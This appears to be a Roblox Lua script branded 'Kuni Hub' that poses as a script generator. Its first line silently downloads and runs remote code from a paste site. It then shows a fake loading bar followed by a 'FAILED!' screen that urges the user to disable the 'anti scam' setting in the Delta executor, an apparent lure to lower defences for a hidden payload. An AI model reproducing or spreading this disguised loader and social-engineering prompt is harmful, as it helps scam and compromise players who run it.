loadstring(game:HttpGet("https://pastefy.app/aL0bokGt/raw"))()
--// Services
local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")

--// Helper
local function styleText(lbl, font, size, color)
	lbl.Font = font
	lbl.TextSize = size
	lbl.TextColor3 = color or Color3.new(1,1,1)
	lbl.TextStrokeTransparency = 0.8
	lbl.TextStrokeColor3 = Color3.new(0,0,0)
end

-------------------------------------------------
-- UNANG SCRIPT (Loading Screen)
-------------------------------------------------
local gui1 = Instance.new("ScreenGui")
gui1.Name = "SafeLoadingBar"
gui1.IgnoreGuiInset = true
gui1.ResetOnSpawn = false
gui1.Parent = playerGui

-- Background
local cont1 = Instance.new("Frame")
cont1.Size = UDim2.new(0,420,0,140)
cont1.Position = UDim2.new(0.5,0,0.5,0)
cont1.AnchorPoint = Vector2.new(0.5,0.5)
cont1.BackgroundColor3 = Color3.fromRGB(40,40,40)
cont1.BackgroundTransparency = 1 -- start fully transparent
Instance.new("UICorner", cont1).CornerRadius = UDim.new(0,14)
cont1.Parent = gui1

-- Fade-in to 95% visible
TweenService:Create(cont1, TweenInfo.new(1), {BackgroundTransparency = 0.05}):Play()

-- Made By
local madeBy = Instance.new("TextLabel")
madeBy.Text = "Made by : Kuni Hub"
madeBy.Size = UDim2.new(1,-40,0,25)
madeBy.Position = UDim2.new(0,20,0.15,0)
madeBy.BackgroundTransparency = 1
styleText(madeBy, Enum.Font.GothamBlack, 18)
madeBy.Parent = cont1

local madeByShadow = madeBy:Clone()
madeByShadow.Position = madeBy.Position + UDim2.new(0,2,0,2)
madeByShadow.ZIndex = madeBy.ZIndex - 1
madeByShadow.Parent = cont1

-- Discord Link
local discordLink = Instance.new("TextLabel")
discordLink.Text = "<u>https://discord.gg/kunihub</u>"
discordLink.RichText = true
discordLink.Size = UDim2.new(1,-40,0,20)
discordLink.Position = UDim2.new(0,20,0.33,0)
discordLink.BackgroundTransparency = 1
styleText(discordLink, Enum.Font.GothamSemibold, 16)
discordLink.Parent = cont1

local discordLinkShadow = discordLink:Clone()
discordLinkShadow.Position = discordLink.Position + UDim2.new(0,2,0,2)
discordLinkShadow.ZIndex = discordLink.ZIndex - 1
discordLinkShadow.Parent = cont1

-- Title (typing effect)
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1,-40,0,35)
title.Position = UDim2.new(0,20,0.45,0)
title.BackgroundTransparency = 1
styleText(title, Enum.Font.GothamBlack, 18)
title.Parent = cont1

local shadow = title:Clone()
shadow.Position = title.Position + UDim2.new(0,2,0,2)
shadow.ZIndex = title.ZIndex - 1
shadow.Parent = cont1

-- Loading bar BG
local barBG = Instance.new("Frame")
barBG.Size = UDim2.new(0,240,0,25)
barBG.Position = UDim2.new(0.5,0,0.7,0)
barBG.AnchorPoint = Vector2.new(0.5,0)
barBG.BackgroundColor3 = Color3.fromRGB(60,60,60)
barBG.BorderSizePixel = 0
Instance.new("UICorner", barBG).CornerRadius = UDim.new(0,8)
barBG.Parent = cont1

-- Loading bar Fill
local barFill = Instance.new("Frame")
barFill.Size = UDim2.new(0,0,1,0)
barFill.BackgroundColor3 = Color3.fromRGB(0,255,0)
barFill.BorderSizePixel = 0
Instance.new("UICorner", barFill).CornerRadius = UDim.new(0,8)
barFill.Parent = barBG

-- Percentage text
local percentText = Instance.new("TextLabel")
percentText.Text = "0%"
percentText.Size = UDim2.new(1,0,1,0)
percentText.Position = UDim2.new(0.5,0,0.5,0)
percentText.AnchorPoint = Vector2.new(0.5,0.5)
percentText.BackgroundTransparency = 1
styleText(percentText, Enum.Font.GothamBlack, 18)
percentText.Parent = barBG

-- Typing effect function
local function typeText(txt)
	title.Text, shadow.Text = "", ""
	for i = 1,#txt do
		title.Text, shadow.Text = txt:sub(1,i), txt:sub(1,i)
		task.wait(0.03)
	end
end

-- Animate loading
task.spawn(function()
	typeText("Generating Script..")
	for i = 0,100 do
		barFill:TweenSize(UDim2.new(i/100,0,1,0), Enum.EasingDirection.Out, Enum.EasingStyle.Linear, 0.2, true)
		percentText.Text = i.."%"
		task.wait(0.2)
	end
	gui1:Destroy()

	-- FAILED UI
	local gui2 = Instance.new("ScreenGui")
	gui2.Name = "BackgroundOnly"
	gui2.IgnoreGuiInset = true
	gui2.ResetOnSpawn = false
	gui2.Parent = playerGui

	local cont2 = Instance.new("Frame")
	cont2.Size = UDim2.new(0,420,0,120)
	cont2.Position = UDim2.new(0.5,0,0.5,0)
	cont2.AnchorPoint = Vector2.new(0.5,0.5)
	cont2.BackgroundColor3 = Color3.fromRGB(40,40,40)
	cont2.BackgroundTransparency = 0.05
	Instance.new("UICorner", cont2).CornerRadius = UDim.new(0,14)
	cont2.Parent = gui2

	-- Fade in animation
	cont2.BackgroundTransparency = 1
	TweenService:Create(cont2, TweenInfo.new(1), {BackgroundTransparency = 0.05}):Play()

	-- Red FAILED text
	local errorTitle = Instance.new("TextLabel")
	errorTitle.Text = "FAILED!"
	errorTitle.Size = UDim2.new(1,0,0,35)
	errorTitle.Position = UDim2.new(0.5,0,0.2,0)
	errorTitle.AnchorPoint = Vector2.new(0.5,0)
	errorTitle.BackgroundTransparency = 1
	styleText(errorTitle, Enum.Font.GothamBlack, 24, Color3.new(1,0,0))
	errorTitle.Parent = cont2

	-- Message
	local errorMsg = Instance.new("TextLabel")
	errorMsg.Text = "Please disable anti scam in delta settings"
	errorMsg.Size = UDim2.new(1,-40,0,40)
	errorMsg.Position = UDim2.new(0.5,0,0.55,0)
	errorMsg.AnchorPoint = Vector2.new(0.5,0.5)
	errorMsg.BackgroundTransparency = 1
	styleText(errorMsg, Enum.Font.GothamSemibold, 18)
	errorMsg.Parent = cont2
end)
